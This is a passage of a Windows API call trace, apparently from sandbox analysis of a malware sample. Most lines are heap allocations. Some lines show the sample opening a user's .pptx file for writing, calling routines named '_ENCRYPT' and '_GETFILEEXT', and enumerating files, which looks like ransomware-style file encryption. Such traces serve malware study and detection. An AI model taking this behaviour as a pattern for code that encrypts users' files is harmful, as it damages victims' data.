lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.535] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\0cznnbzljlbq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa2) returned 0x7c5448 [0030.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=81, lpWideCharStr=0x7c5448, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx") returned 81 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.537] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.538] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.539] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.540] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.540] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0030.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.540] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.541] CloseHandle (hObject=0x140) returned 1 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.541] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.542] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.542] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.542] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.542] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.542] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.542] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\0CZNNBZljlBQ.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, 